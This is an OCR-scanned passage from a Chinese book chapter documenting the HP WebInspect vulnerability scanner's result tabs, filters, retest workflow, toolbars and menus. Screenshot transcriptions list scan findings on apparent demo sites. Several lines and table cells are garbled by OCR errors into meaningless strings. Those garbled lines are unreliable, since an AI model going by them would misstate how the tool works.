* 检查 ID(Check ID): WebInspect 探头 用 于 检查 特定 漏洞 存在 的 标识 号 。 例 如 ， 检 查 
编号 742 测试 数据 库 服 务 器 的 错误 消息 。 

。 路 径 (Path): 分 层 路 径 资源 。 

。 方法 (Method); 用 于 攻击 的 HITP 方法 。 

。 堆栈 (Stack): 从 HP Fortify Software 安全 中 心 获 得 的 堆栈 跟踪 信息 。 此 列 仅 当 
SecurityScope 在 扫描 过 程 中 启用 。 

* 漏洞 参数 (Vuln Param): 有 漏洞 的 参数 名 称 。 

。 参数 (Parameters): 分 配 的 参数 和 值 名 称 。 

。 发 布 状态 (Published Status): 存在 于 软件 安全 中 心 以 前 发 布 的 状态 。 

* HERA Pending Status): 该 扫描 还 没有 发 布 的 状态 (由 Weblnspect 手动 或 自动 分 配 )。 

* 手动 (Manual): 如 果 该 漏洞 被 手动 创建 ， 显 示 一 个 复 选 标记 。 

。 重复 Duplicates): 通过 SecurityScope 检测 到 的 漏洞 可 以 追溯 到 同一 个 源头 。 

。 地 点 (Locatiom): 路 径 和 揭示 漏洞 的 数据 。 
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* CWEID: 与 漏洞 相关 的 共同 脆弱 性 的 枚 举 标识 符 。 

* 领域 (Kingdom): 在 这 个 漏洞 被 归 类 时 ， 使 用 Fortify Software 安全 研究 小 组 开发 的 软 
件 安全 性 错误 的 分 类 类 别 。 

e 单 击 超 链接 导航 到 http:/www hpenterprisesecurity.com/vulncat/en/vulncat/ index.html. 


Severity =] | Type fit 
ma] check 
Path Method Vuln P; 


E Severity- i) critcal (311 Sroup by Field 
- V Group by Box 
aed em SaL nj Severity 
htp-/[mysal-winzks eid 
nnp //mysawinzea Seve as Default View Check 
p ys nA Reset Default View Check ID 


Reset Factory Settings | Y Path 
http://mysal-win2k37mores-aspr v Method 
[3i Check:Cross-Site Scripting (1 item) v Vuln Param 
http://mysal-win2k3/Pugnose/secure_editasp | Y Parameters 
E Check:Database Server Error Message (14 items) 
hitp-//mysal-win2k3/Search/TrainingSite/product, 4 
http://mysal-win2k3/Search/TrainingSite/notes asp 


图 10-18 漏洞 选项 卡 右键 快捷 菜单 


Manual 
Location 
CWE ID 


* 重复 性 (Reproducible): 值 可 以 被 复制 。 此 列 仅 适 用 于 网 站 的 重复 试验 (验证 漏洞 )。 
漏洞 的 严重 程度 由 以 下 图 标 表示 ， 如 图 10-19 所 示 。 


[ Critica | High | Medium | Low 


9. 8 9,9 


图 10-19 漏洞 的 严重 程度 


如 果 单 击 列表 中 的 一 个 条 目 ， 信 息 窗 格 中 的 相关 信息 以 及 会 话 会 突出 显示 出 来 。 选 中 会 
话 ， 也 可 以 通过 从 会 话 信息 面板 中 选择 一 个 选项 ， 查 看 相关 信息 。 对 于 发 送 和 查询 参数 ， 单 
击 参数 列 中 的 条 目 ， 将 显示 该 参数 的 一 个 更 可 读 的 概要 。 用 鼠标 右键 单 击 列表 中 的 条 目 ， 会 
显示 下 面 列表 中 所 描述 命令 的 快捷 菜单 。 
使 用 快捷 菜单 ， 右 键 单 击 漏洞 选项 卡 上 的 漏洞 描述 ， 用 户 可 以 : 
。 复制 网 址 (Copy URL): 复制 网 址 到 Windows 剪贴 板 。 
。 复制 选择 条 目 (Copy Selected Item(s)): 复制 选 定 的 条 目 到 Windows 剪贴 板 中 的 文本 。 
。 复制 所 有 条 目 (Copy AN Items): 复制 所 有 的 条 目 到 Windows 剪贴 板 中 的 文本 。 
。 导出 (Export); 创建 一 个 逗号 分 隔 值 (CSV) 文 件 ， 其 中 包含 所 有 或 选 定 条 目 ， 并 在 
Microsoft Excel 中 显示 。 
。 在 浏览 器 中 查看 (View in Browser): 在 浏览 器 中 呈现 HTTP 响应 。 
。 当前 值 的 过 滤器 (Filter by Current Value): 限制 那些 满足 选择 标准 显示 的 漏洞 。 例 如 ， 
如 果 在 Post 方法 列 单 击 鼠标 右键 ， 然 后 选择 Filter by Current Value， 列 表 中 只 显示 那 
些 通过 使 用 POST 方法 发 送 的 被 发 现 的 HTTP 请 求 漏洞 。 
。 更 改 发 布 状 态 (Modify Publish Status): 发 布 到 HP Fortify Software 安全 中 心 之 前 可 以 
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更 改 漏洞 /问题 的 状态 。 只 有 当 连 接 到 WebInspect Enterprise， 该 命令 才 可 用 。 
。 更 改 严重 性 (Change Severity): 允许 更 改 严 重 性 级 别 。 
。 编辑 漏洞 (Edit Vulnerability): 允许 添加 、 删 除 或 编辑 与 选 定 会 话 相 关 的 漏洞 。 
。 审阅 漏洞 (Review Vulnerability): 重新 测试 漏洞 会 话 ， 将 其 标记 为 误 报 或 忽视 , 或 将 
其 发 送 到 HP 质量 中 心 或 BM Rational ClearQuest。 
。 标记 为 (Mark As): 允许 作为 误 报 标记 漏洞 或 忽略 。 要 查看 误 报 ， 在 扫描 信息 面板 中 
选择 误 报 。 查 看 忽略 的 漏洞 ， 在 扫描 信息 面板 中 选择 对 象 ， 单 击 删 除 条 目 中 相关 联 
的 数字 ， 当 恢复 已 删除 条 目 窗口 出 现 ， 从 下 拉 列 表 中 选择 漏洞 。 
。 发 送 到 (Send To): 转换 该 漏洞 的 缺陷 ， 并 将 其 添加 到 HP 质量 中 心 或 IBM Rational 
ClearQuest 数据 库 。 
。 删除 位 置 (Remove Location): 从 导航 窗 格 中 删除 会 话 。 注意 : 用 户 可 恢复 删除 的 会 话 。 
。 Jféff(Crawl: MEITENI URL. 
* 工具 (Tools): 介绍 可 用 工具 的 子 菜单 。 
* 附件 (Attachments): 允许 创建 与 选 定 会 话 相关 的 说 明 ， 标 志 会 话 跟 进 ， 添 加 一 个 漏 
洞 说 明 ， 或 添加 一 个 漏洞 快照 。 
如 果 右 键 单 击 一 个 组 标题 ， 通 过 一 个 快捷 菜单 可 以 进行 如 下 操作 : 
e 折 对 /展开 所 有 组 (Collapse/Expand All Groups) 
© PAE H(Collapse/Expand Group) 
。 复制 选 定 的 条 目 (Copy Selected Item(s)) 
。 复制 所 有 条 目 (Copy All Items) 
。 更 改 严重 性 (Change Severity) 
。 标记 为 (Mark as) 
。 发 送 到 (Send to) 
。 删除 位 置 Remove Location) 
WebInspect 可 从 导航 窗 格 (在 这 两 个 网 站 和 序列 视图 ) 和 摘要 窗 格 中 的 Vulnerability 选项 
上 中 删除 条 目 。 它 也 忽略 了 这 些 条 目的 任何 报告 。 删 除 的 条 目 数 量 会 显示 在 仪表 板 上 (在 扫描 
类 别 下 )。 用 户 可 利用 下 面 的 过 程 恢复 删除 的 会 话 和 忽略 的 漏洞 。 
1) 单 击 出 现在 删除 条 目标 题 附 近 突 出 显示 的 数目 。 恢 复 已 删除 条 目 窗口 显示 删除 会 话 或 
删除 漏洞 列表 。 
2) 单 击 下 拉 列 表 在 忽略 漏洞 和 删除 会 话 之 间 进 行 切换 。 
3) 选中 要 恢复 一 个 或 多 个 条 目的 复 选 框 。 
4) 要 查看 时 选择 条 目的 详细 信息 ， 选 择 Show details when selected( 显 示 详 细 信息 )。 
5) 当 系 统 提 示 用 户 确认 选择 时 ， 单 击 Recover( 恢 复 )， 然 后 单 击 Yes。 
恢复 漏洞 重新 出 现在 导航 窗 格 中 网 站 和 序列 视图 上 (连同 它们 的 父 会 话 )， 也 重新 出 现在 
摘要 窗 格 中 Vulnerabilities( 漏 洞 ) 选 项 卡 上 。 在 导航 窗 格 中 恢复 会 话 也 随 着 子 会 话 和 它们 的 漏 
洞 再 次 出 现 。 
进行 扫描 后 ， 报 告 会 发 现 漏洞 ， 开 发 者 可 以 纠正 他 们 的 代码 并 更 新 网 站 。 然 后 ， 用 户 可 


E 
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打开 原始 扫描 ， 选 择 历史 漏洞 会 话 (once-vulnerable session， 也 可 称 为 修复 )， 然 后 从 快捷 菜单 
中 选择 Review Vulnerability( 审 阅 漏洞 )。 假设 该 网 站 的 基本 架构 并 没有 改变 , 则 不 必 重 新 扫描 
整个 网 站 ( 某 些 情况 下 ， 可 能 需要 几 个 小 时 甚至 几 天 )， 用 户 验 证 的 威胁 也 不 再 存在 。 

使 用 此 功能 只 是 为 了 再 次 检查 报告 的 漏洞 ， 即 使 扫描 仍 在 运行 中 也 可 以 进行 检查 。 

1) 从 导航 窗 格 (或 右键 单 击 摘要 窗 格 的 漏洞 选项 卡 上 的 URL) 右 键 单 击 一 个 漏洞 会 话 。 

2) 从 快捷 菜单 中 选择 Review Vulnerability( 审 阅 漏洞 )。 打 开 审 阅 漏洞 窗口 。 

3) 如 果 要 通过 Web 代理 服务 器 来 访问 网 站 , 单 击 Options( 选 项 ), 选择 Launch and Direct 
Traffic through Web Proxy(Web 代理 启动 和 直接 流量 )。 

4) 如 果 有 多 个 安全 漏洞 与 选 定 会 话 相 关联 ， 从 Vulnerabilities to Test( 测 试 漏洞) 列表 选择 


=A 
5) 使 用 右 侧 客户 区 的 选项 卡 以 显示 有 关 原 始 (original) 会 话 信息 (如 在 URL 列 下 的 低 窗 格 
中 选 定 ): 

浏览 器 :服务 器 的 响应 ， 如 在 浏览 器 中 呈现 。 

请 求 : 原始 的 HTTP 请 求 消息 。 

响应 :原始 的 HTTP 响应 消息 。 

漏洞 :漏洞 说 明 ， 影 响 和 建议 如 何 解决 此 漏洞 。 

6) 要 重新 测试 选 定 漏洞 的 会 话 ， 单 击 Retest( 重 新 测试 )。 

重新 测试 的 结果 显示 在 状态 栏 和 Response Match Status( 响 应 匹配 状态 ) 列 下 方 的 窗 格 中 。 

状态 报告 为 “Vulnerability<VulnerabilityName>Detected” 或 “Vulnerability <Vulnerability- 
Name> Not Detected。” 

所 报告 结果 的 可 靠 性 由 响应 匹配 状态 决定 ， 可 具有 以 下 值 : 

匹配 (Matchb): 资源 并 没有 显著 改变 ; WebInspect 能 通过 使 用 原来 路 径 相 同 的 扫描 来 访问 
会 话 。 

无 结论 (nconclusive): 基于 HTTP 响应 ， 该 资源 用 可 能 (或 不 可 能 ) 的 方式 来 标识 漏洞 重 
新 检测 过 程 中 有 或 没有 检测 到 改变 。 

不 同 (Different): HTTP 响应 与 从 原始 扫描 过 程 中 接收 到 的 响应 是 完全 不 同 的 ， 提 示 资 源 
发 生 重大 变化 。 

7) 如 果 用 户 认为 WebInspect 错误 地 判断 了 漏洞 存在 ， 可 通过 单 击 Mark as False Positive 
(标记 为 误 报 ) 标 出 漏洞 。 

8) 要 忽略 漏洞 ， 单 击 Mark as( 标 记 为 )， 然 后 从 下 拉 列 表 中 选择 Ignored( 忽 略 )。 

9) 要 转换 一 个 或 多 个 漏洞 的 缺陷 ， 并 将 其 添加 到 惠普 质量 中 心 或 IBM Rational 
ClearQuest 数据 库 ， 单 击 Send To( 发 送 到 )。 

2. 未 发 现 选 项 卡 


只 有 当 WebInspect 连接 到 WebInspectEnterprise 或 评估 管理 平台 (AMP), 此 标签 才 有 密切 
关系 ， 目 的 是 用 于 同步 和 上 传 漏洞 数据 到 HP Fortify Software 安全 中 心 。 它 列 出 了 一 个 特定 
的 条 目 版 本 ， 这 个 版 本 是 以 前 扫描 检测 到 的 漏洞 ， 而 不 是 由 当前 扫描 检测 到 的 。 这 些 漏洞 未 
被 记录 在 仪表 板 的 计数 中 ， 也 未 出 现在 导航 窗 格 中 的 网 站 或 序列 视图 中 。 
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在 快捷 菜单 中 的 选项 ， 分 组 和 筛选 功能 与 Vulnerabilities( 漏 洞 ) 选 项 卡 中 的 描述 相同 。 
3. 信息 选项 卡 


信息 选项 卡 列 出 了 WebInspect 评估 或 聆 行 过 程 中 发 现 的 信息 。 这 些 不 被 视 为 安全 漏洞 ， 
而 是 在 网 站 、 某 些 应 用 程序 或 Web 服务 器 识别 的 关注 点 。 单 击 列 出 的 URL， 该 程序 突出 显 
示 了 导航 窗 格 中 的 相关 条 目 。 

在 快捷 菜单 中 的 选项 、 分 组 和 筛选 功能 与 Vulnerabilities( 漏 洞 ) 选 项 卡 中 的 描述 相同 。 

4. 最 佳 实践 选项 卡 


WebInspect 检测 出 的 最 佳 实践 选项 卡 列表 问题 涉及 被 Web 开发 者 共同 接受 的 最 佳 实践 。 
这 里 列 出 的 条 目 不 是 漏洞 ， 而 是 整体 网 站 质量 和 网 站 开发 的 安全 实践 (或 缺乏 ) 指 标 。 

在 快捷 菜单 中 的 选项 ， 分 组 和 筛选 功能 与 Vulnerabilities( 漏 洞 ) 选 项 卡 中 的 描述 相同 。 

5. 扫描 日 志 选 项 卡 


使 用 Scan Log( 扫 描 日 志 ) 选 项 卡 以 查看 有 关 WebInspect 评估 行为 的 信息 。 比 如 ， 应 用 于 
针对 网 站 存在 的 特定 审计 方法 的 时 间 将 在 这 里 列 出 。 用 户 可 在 应 用 程序 设置 窗口 中 使 用 
Logging( 日 志 ) 记 录 选 项 选择 日 志 记 录 级 别 (调试 、 信 息 、 人 警告、 错误 或 致命 )， 如 图 10-20 
所 示 。 


回 因 Error * Warnings [7] Q)Messages A Detail 


Time Level 
(6/27/2012 8:19:25 AM into 
6/27/20128:2115 AM — Info 
6/27/2012 8:2115 AM — Info 
6/27/2012 8:2116 AM — Info 
6/27/20128:2116 AM — Info 
6/27/20128:2116 AM — Info 
6/27/2012 8:2146 AM — Info 
6/27/20128:2116 AM — Info 
5/27/20128:2146 AM — Info nda: 
6/27/20128:2116 AM — Info Starting Recommendation Module: Web Service: 


"Z Not Found | © Information | [Z] Best Practices | |-j Scan Log 


€) Vulnerabilities 


图 10-20 扫描 日 志 选项 卡 


6. 服务 器 信息 选项 卡 
这 个 选项 卡 列 出 关注 的 相关 服务 器 条 目 。 这 里 仅 列 出 一 个 条 目 或 事件 的 发 生 。 


1) 使 用 过 滤器 
用 户 可 查看 符合 以 下 指定 两 种 方法 之 一 的 条 目的 子 集 : 

。 在 窗 格 的 右上 角 使 用 组 合 框 输入 筛选 条 件 。 

。 ”右键 单 击 任 一 列 的 值 ， 并 从 快捷 菜单 中 选择 Filter by Current Value( 当 前 值 过 滤器 ) 。 

这 种 过 滤 能 力 适 用 于 所 有 摘要 窗 格 中 的 选项 卡 ， 除 了 Scan Log( 扫 描 日 志 )。 

在 下 面 的 例子 中 ， 第 一 个 画面 显示 了 漏洞 选项 卡 上 未 过 滤 的 条 目 。 第 二 个 画面 显示 过 滤 
条 件 中 的 “Method:Get”。 

无 过 滤 条 件 ， 如 图 10-21 所 示 。 
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ER ye a-Qv 
Pan Method Vuinparam Parameters Pending Status Published Status 
http://zero.webappsecurity.com/test/cgi.zip GET - fj Unknown None 

E Check Cross-Site Scripting (36 items] 
http-//zero.webappsecurity.com/acctxferconfirm asp. POST fromAcct. (Post)from. ? Unknown. None 
http-//zero.webappsecurity.com/acctferconfirm.asp POST amount (Postifrom. ? Unknown. None 
http-//zero.webappsecurity.com/acctxferconfirm asp. POST toAcct (Post)from. 4 Unknown None 
hump://zero. webappsecurity. com/bankiogin asp GET em (Queryjerr. “J Unknown None 
http://zero.webappsecurity.com/cookietest/ShowCook... GET = 7 Unknown. None 
9 Vulnerabilities | 了 Not Found | @ Information | [7] Best Practices | [^1 Scan Log | d Server Information | 


图 10-21 ”漏洞 选项 卡 上 无 过 滤 条 件 


过 滤 条 件 : Get， 如 图 10-22 所 示 。 


[Severny Method:Get. 
see | [eck 
Path Method Vuln Param Parameters Pending Status Published Status 
= Severity.) Critical (54 items) 
[E Check Backup File (cg tp) (3 items) 
tp /aero webappsecurity com/admin/cgi zip GET - 了 Unknown None 
hmp//zero webappsecuriy comy/cglzip GET - 3 Unknown None 
tp //zero webappsecuritycom/test/cg. zip GET - 了 Unknown None 
E Check:Cross-Site Scripting (25 items) 
hmp //zero webappsecurity com/banklogin asp. GT em (Queer. ^ Unknown None 
tp: //zero webappsecurity com/cookletest/ShowCook.. GET - 了 Unknown None 
Q9 Vulnerabilities | 了 Not Found | @ Information | [7] Best Practices | {>} Scan Log | s Server Information 


图 10-22 ”漏洞 选项 卡 上 有 过 滤 条 件 : Get 


请 注意 ， 过 滤 条 件 (方法 : Geb 出 现在 组 合 框 ， 其 中 也 包含 了 红色 的 X。 单 击 它 来 去 除 过 
滤 和 返回 到 原来 列表 。 

在 过 滤 组 合 框 中 键入 条 件 时 指定 多 个 过 滤 条 件 ， 插 入 过 滤 条 件 之 间 用 逗号 隔 开 (如 参数 
noteid， 方 法 : GET). 

筛选 条 件 : 可 输入 以 下 标识 : 

。 检查 (check): 检查 名 称 ; 

* Cookienamerp: HTTP 响应 中 的 Cookie 名 称 ; 

* cookienamerq: HTTP 请 求 中 的 Cookie 名 称 ; 

* cookievaluerp: HTTP 响应 中 的 Cookie 值 ; 

* cookievaluerq: HTTP 请 求 中 的 Cookie 值 ; 

* (duplicates): 通过 SecurityScope 重复 检测 ; 

* filrq: HTTP 请 求 文件 名 和 扩展 名 ; 

* headernamerp: HTTP 啊 应 头 名 ; 

* headernamerq: HTTP 请 求 报头 名 ; 

* headervaluerp: HTTP 响应 头 值 ; 

。 headervaluerq: HTTP 请 求 头 值 ; 

* 位 置 Qocation): 路 径 加 上 参数 识别 资源 ; 

* 手动 (manuaD: 一 个 位 置 手动 添加 (语法 手册 : True， 或 手动 : False); 
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。 方法 (method): HTTP 方法 (GET，POST); 

* methodrq: 1E HTTP 请 求 中 指定 的 方法 ; 

。 参数 (parameters): 在 HTTP 请 求 中 指定 的 参数 ; 

。 路 径 (path): 路 径 识别 资源 (不 带 参 数 ); 

。 Rawrp: 原始 HTTP 响应 ; 

。 Rawrq: 原始 HTTP 请 求 ; 

* sessiondataid: 会话 数据 的 标识 符 ; 

。 严重 性 (severity):; 分 配给 一 个 漏洞 (关键 ， 高 ， 中 ， 低 ) 的 严重 性 ; 
o 栈 (stack): 通过 SecurityScope 返回 堆栈 跟踪 (语法 是 堆栈 : True 或 堆栈 : False): 
* StatusCode: HTTP 状态 代码 ; 

* Typerq: 请 求 的 类 型 : query、post 或 SOAP; 

。 Vparam: 该 漏洞 参数 。 

2) 使 用 组 


用 户 可 将 条 目 转换 为 基于 列 标题 的 类 别 。 要 做 到 这 一 点 ， 在 窗 格 的 顶部 只 需要 拖 动 标题 
并 拖 放 到 分 组 区 域 。 图 10-23 中 的 漏洞 是 先 通过 风险 、 然 后 按照 名 称 字母 顺序 进行 的 分 组 。 
如 果 右 键 单 击 列 标题 ，WebInspect 可 以 显示 下 列 快捷 菜单 : 


领域 分 组 (Group by Field): 根据 所 选择 的 领域 将 漏洞 分 组 。 

框 分 组 (Group by Box): 显示 “分 组 依据 ”区 域 中 ， 用 户 可 以 通过 列 标题 进行 分 组 。 
列 (Columns): 允许 选择 显示 哪 一 列 。 

另存 为 默认 视图 (Save as Default View): 保存 当前 的 分 组 模式 作为 默认 视图 并 全 前 
扫描 。 


[Severity z Type filter criteria. qa -QF m 


Path Method | Vuln Param Parameters Pending Status | Published Stat 


E Check-Backup File (cgi zip) (3 items) 
http://zero.webappsecurity.com/admin/cgi zip. GET - FP Unknown ^ None 


Ihttp://zero.webappsecurity.com/cgi.zip. - Unknown None 
http://zero.webappsecurity.com/test/cgi.zip GET - 了 Unknown None 


i Check:Cross-Site Scripting (36 items) 
hitp://zero.webappsecuritycom/acctxferconfirm.asp POST —— fromAcct (Postjfrom “J Unknown None 


http://zero.webappsecurity.com/accterconfirm.asp POST amount (Post}from.. “J Unknown None 


(9 Vulnerabilities | 7 Not Found | @ Information | [7) Best Practices | |^) Scan Log | s Server Information 


E1023 ”选中 漏洞 


重 置 默认 视图 (Reset Default View): 恢复 分 组 范式 到 初始 化 的 默认 视图 。 
恢复 出 厂 设置 (Reset Factory Settings): 恢复 分 组 范式 到 原始 视图 模式 (严重 性 > 检查 )。 


10.2.5 Weblnspect 工具 栏 


WebInspect 窗口 包含 两 个 工具 栏 : 扫描 和 标准 。 用 户 可 通过 选择 View 一 Toolbars( 视 图 一 
工具 栏 ) 显 示 或 隐藏 任何 工具 栏 。 
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表 10-6 列 出 了 WebInspect 扫描 工具 栏 上 的 可 用 按钮 。 


表 10-6 扫描 工具 栏 按钮 
功 能 


> Start | Resume 


HI Pause 


DÒ Skip 


E EB 


FP Audit 


(Rescan v 


M Compare 


a Synchronize 


E Publish 


用 户 可 以 暂停 扫描 ， 然 后 继续 扫描 。 此 外 ， 完 成 扫描 可 能 包含 未 
发 送 ( 因 为 超时 或 其 他 错误 ) 的 会 话 ; 如 果 单 击 Start( 开 始 )， 
WebInspect 将 试图 重新 发 送 这 些 会 话 

中 断 正在 进行 的 扫描 。 用 户 可 通过 单 击 开 始 /恢复 图 标 继续 扫描 
当 进 行 连续 朴 行 和 审计 时 ， 用 户 可 跳 过 引擎 正在 运转 的 处 理 部 分 
(如 果 选 择 Test each engine type per session( 测 试 每 个 会 话 的 每 个 引 
擎 类 型 ) 或 跳 过 扫描 处 理 的 会 话 ( 如 果 选 择 Test each session per 
engine type( 测 试 每 台 引 擎 类 型 的 每 个 会 话 ) 

如 果 进 行 只 息 行 扫描 或 步 模式 扫描 ， 可 在 扫描 后 单 击 此 图 标 进行 
审计 
仅 当选 择 扫描 选项 卡 时 显示 此 按钮 。 如 果 从 下 拉 菜 单 中 选择 Scan 
Again( 再 次 扫描 ), 它 会 启动 上 次 使 用 扫描 时 预先 设置 的 扫描 向 导 。 
如 果 选 择 Verify Vulnerabilities( 验 证 漏洞 ), 则 只 对 原始 扫描 到 有 漏 
洞 的 目标 网 站 进行 检 沈 
仅 当选 择 扫描 选项 卡 时 显示 此 按钮 。 可 通过 比较 同一 目标 的 两 个 
不 同 扫描 发 现 漏洞 

此 按钮 仅 连接 到 WebInspect Enterprise 后 出 现 。 它 允许 指定 软件 安 
全 中 心 (SSC) 和 版 本 。WebInspect 可 从 SSC 再 次 下 载 漏洞 列表 , 比 
较 下 载 的 漏洞 和 当前 扫描 的 漏洞 ， 为 当前 扫描 到 的 漏洞 分 配 一 个 
合适 的 状态 (新 建 、 现 有 、 重 新 或 者 未 找到 ) 

比 按钮 仅 连接 到 WebInspect Enterprise 后 出 现 ， 当 用 户 已 同步 到 
WebInspect 软件 安全 中 心 后 并 启用 。 它 通过 WebInspect 将 项 目 版 
本 数据 上 传 到 企业 软件 安全 中 心 


[Run in amp 


ANE 


此 按钮 仅 在 WebInspect 连接 到 评估 管理 平台 (AMP) 时 出 现在 打开 
的 扫描 选项 卡 中 。 它 允许 将 扫描 设置 发 送 到 AMP, AMP 创建 一 
个 扫描 请 求 ， 并 发 送 到 扫描 队列 中 的 下 一 个 可 用 检测 部 件 


F Run in WebInspect Enterprise| 


比 按钮 仅 出 现在 Weblnspect 连接 到 WebInspect Enterprise 且 扫 描 
具有 焦点 时 。 它 允许 将 扫描 设置 发 送 到 WebInspect Enterprise， 
WebInspect Enterprise 创建 一 个 扫描 请 求 ， 并 发 送 到 扫描 队列 中 的 
一 个 可 用 检测 部 件 
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K 10-7 列 出 了 WebInspect 标准 工具 栏 上 的 可 用 按钮 。 


表 10-7_ 标 准 工 具 栏 按钮 


功 能 


允许 启动 向 导 扫描 、 网 站 扫描 、Web 服务 扫描 或 企业 扫描 


允许 打开 一 个 扫描 或 报告 


A} Compliance Manager 


打开 合 规 管理 器 ， 人 允许 创建 一 个 合 规 政策 


À Policy Manager 


打开 策略 管理 器 ， 人 允许 修改 WebInspect 的 扫描 策略 ， 并 创建 
自 定义 检查 ， 以 检查 特定 漏洞 


m 


Report| 


“ Schedule. 
I] SmartUpdate 


aMPp Webconsole 


F WebInspect Enterprise WebConsole 


如 果 单 击 stat 页 面具 有 焦点 时 ，WebInspect 可 以 提示 扫描 ， 
然后 允许 选择 报告 。 如 果 单 击 扫描 选项 卡 具 有 焦点 时 ， 会 提 
示 选 择 要 打开 的 扫描 报告 

安排 发 生 在 特定 时 间 和 日 期 的 扫描 

联系 HP 中 央 数 据 库 ， 以 确定 系统 是 否 有 可 用 的 更 新 ， 如 果 存 
在 更 新 ， 提 示 用 户 安装 

启动 AMP 的 Web 控制 台 应 用 程序 。 只 有 当 用 户 连接 到 AMP 
时 显示 此 按钮 

启动 WebInspect EnterpriseWeb 控制 台 应 用 程序 。 只 有 当 用 户 
连接 到 WebInspect Enterprise 时 显示 此 按钮 


K 10-8 说 明了 管理 扫描 工具 栏 上 可 用 的 按钮 。 


表 10-8_ 管理 扫描 工具 栏 按钮 


功 能 


要 打开 扫描 ， 选 择 一 个 或 多 个 扫描 ， 然 后 单 击 Open( 或 直接 双击 列表 中 的 条 目 )。 
WebInspect 可 以 加 载 扫描 数据 并 显示 每 次 扫描 的 单独 选项 卡 


i m 


Me Rename 


要 启动 预先 设置 的 最 近 用 于 选 定 扫描 的 扫描 向 导 , 单 击 Rescan Scan Again( 重 新 
扫描 一 再 次 扫描 )。 仅 重新 扫描 那些 以 前 扫描 过 程 中 发 现 漏洞 的 会 话 , 选择 一 个 扫 
描 ， 并 单 击 Rescan Retest Vulnerabilities( 重 新 扫描 一 重新 测试 漏洞 ) 

要 重新 命名 选 定 的 扫描 ， 单 击 Rename( 重 命名 ) 


* Delete 


要 删除 选 定 的 扫描 ， 单 击 Delete( 删 除 ) 


@ Import 


要 导入 扫描 ， 单 击 Import( 导 入 ) 
要 导出 扫描 ， 导 出 扫描 的 详细 信息 , 或 导出 扫描 到 软件 安全 中 心 ， 单 击 Export( 导 


出 ) 的 下 拉 箭 头 
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(i) 
mou 功 能 
为 比较 扫描 ， 选 择 两 个 扫描 (使 用 Ctrl + 单 击 )， 然 后 单 击 Compare( 比 较 ) 


接 ， 单 击 Connections( 连 接 ) 
© Refresh 必要 时 ， 单 击 Refresh( 刷 新 ) 以 更 新 显示 


默认 情况 下 ，WebInspect 列 出 保存 在 本 地 SQL Server Express Edition 和 配置 SQL 
|.j Connections Server 标准 版 的 所 有 扫描 。 要 选择 一 个 或 两 个 数据 库 ， 


或 指定 一 个 SQL Server 连 


10.2.6 Weblnspect 菜单 栏 


菜单 栏 包含 以 下 菜单 ; 

。 文件 (File) 

。 扫描 (Scan) 

。 编辑 (Edit) 

。 企业 服务 器 (Enterprise Server) 
。 视图 (View) 

* 报告 (Reports) 

。 工具 (Tools) 

。 帮助 (Help) 


1) 文件 菜单 
下 面 的 命令 在 文件 菜单 中 可 用 。 


单 击 Columns( 列 ) 选 择 要 显示 哪些 列 。 也 可 以 重新 排列 各 列 顺序 ， 使 用 上 移 下 移 


按钮 ， 或 者 在 管理 扫描 列表 中 ， 可 以 简单 地 拖 放 列 标题 


新 建 (New): 人 允许 用 户 选择 向 导 扫描 、 基 础 扫描 、Web 服务 扫描 或 企业 扫描 ， 从 而 启动 


相应 的 向 导 ， 引 导 用 户 完 成 扫描 的 过 程 。 
打开 (Open): 允许 打开 任何 一 个 扫描 或 报告 。 


计划 (Schedule): 打开 管理 扫描 调度 窗口 ， 允 许 添 加 、 编 辑 或 删除 计划 扫描 。 


导入 扫描 (Import Scan): 允许 导入 扫描 文件 。 

导出 (Exporb: 让 用 户 导出 扫描 文件 或 扫描 详细 信息 文件 。 

关闭 选项 卡 (Close Tab): 当 多 个 选项 卡 打 开 时 ， 关 闭 当前 标签 。 
退出 (Exib: 关闭 WebInspect 程序 。 


2) 编辑 菜单 
下 面 的 命令 在 编辑 菜单 中 可 用 。 


默认 扫描 设置 (Default Scan Settings): 显示 默认 的 设置 窗口 ， 允 许 用 户 选择 或 修改 用 于 扫 


描 的 选项 。 


当前 扫描 设置 (Current Scan Settings): 显示 一 个 设置 窗口 ， 人 允许 上 
选项 。 


户 选择 或 修改 当前 扫描 
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管理 设置 (Manage Settings): 打开 一 个 窗口 ， 人 允许 用 户 添加 、 编 辑 或 删除 设置 文件 。 

应 用 程序 设置 (Application Settings): 显示 应 用 程序 设置 窗口 ， 允 许 用 户 选择 或 修改 控制 
WebInspect 应 用 程序 操作 选项 。 

复制 网 址 (Copy URL): 将 选 定 的 URL 复制 到 Windows 剪贴 板 。 

复制 扫描 日 志 (Copy Scan Log): 将 日 志 ( 所 选 选项 卡 上 的 扫描 ) 复 制 到 Windows 剪贴 板 。 


3) 视图 菜单 

下 面 的 命令 在 View 菜单 中 可 用 。 

自动 换行 (Word Wrap): 当 查 看 HTTP 请 求 和 响应 时 ， 在 显示 区 域 的 右 侧 边 距 插入 回 车 。 
只 有 当选 中 扫描 选项 卡 时 ， 该 命令 才 可 用 。 
THH (Toolbars): 允许 用 户 选 择 要 显示 的 工具 栏 。 


4) 工 具 菜 单 

工具 菜单 命令 用 来 启动 被 WebInspect 封装 的 工具 应 用 程序 。 

5) 扫描 菜单 

只 有 当选 中 扫描 选项 卡 具 有 焦点 ， 扫 描 菜单 才 是 可 见 的 。 它 包含 下 面 的 命令 。 


开始 /恢复 (StarvResume): 用 户 和 暂停 程序 后 ， 开 始 或 恢复 扫描 。 

暂停 (Pause): 暂停 怜 行 或 审计 程序 。 单 击 Resume( 恢 复 ) 继 续 扫描 。 

跳 过 (Skip): 如 果 审 计 正在 进行 中 ， 跳 到 下 一 个 审计 方法 。 如 果 在 这 个 过 程 中 正在 进行 
Wetr, Wa. 

审计 (Audib: WEET PISIS. SEET EOE HP BOX BE Eon s 

重新 扫描 (Rescan): 此 命令 将 启动 上 次 所 选 扫描 预先 设 定 的 扫描 向 导 。 


6) 企业 服务 器 菜单 

Enterprise Server 菜单 包含 以 下 命令 。 除了 Connect to AMP 的 所 有 命令 , 仅 当 WebInspect 
连接 到 一 个 企业 服务 器 时 , Connect to WebInspect Enterprise 以 及 About Enterprise Servers 是 可 
用 的 。 

连接 到 AMP/ 断 开 (Connect to AMP/Disconnect): 建立 或 断 开 评估 管理 平台 (AMP) 服 务 器 
的 连接 。 

连接 到 WebInspect Enterprise/ 断 开 (Connect to WebInspect Enterprise/Disconnect): 建立 或 
HFF WebInspect Enterprise(WIE) 服 务 器 的 连接 。 

上 传 扫描 (Upload Scan): 用 于 将 数据 传送 到 AMP 服务 器 进行 扫描 ， 供 用 户 选择 。 在 “ 自 
